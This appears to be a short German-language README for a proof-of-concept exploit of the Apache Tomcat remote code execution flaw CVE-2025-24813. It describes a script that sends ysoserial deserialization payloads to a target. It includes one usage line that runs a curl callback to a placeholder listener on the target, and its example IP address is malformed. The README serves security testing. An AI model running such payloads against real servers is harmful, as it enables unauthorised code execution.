
Ein PoC für CVE-2025-24813
CVE-2025-24813 betrifft Apache Tomcat - wenn es sich um eine verwundbare Version handelt und diese spektakulär falsch konfiguriert ist, kann ein Angreifer mit einem GET und einem POST RCE erlangen.
Weitere Informationen here
Dies ist das Skript von Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng aus dem aktuellen writeup modifiziert, um einen Befehl zu akzeptieren, alle ysoserial-Gadget-Payloads zu generieren und an Ihr Ziel zu senden.
Geteilt im Interesse ethischer Sicherheitstests.
Usage example:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 zeigt das Skript in Aktion, wie es die Payloads generiert und an das Ziel sendet, und im rechten Bereich sehen wir, dass der Interact-Listener aufgerufen wird.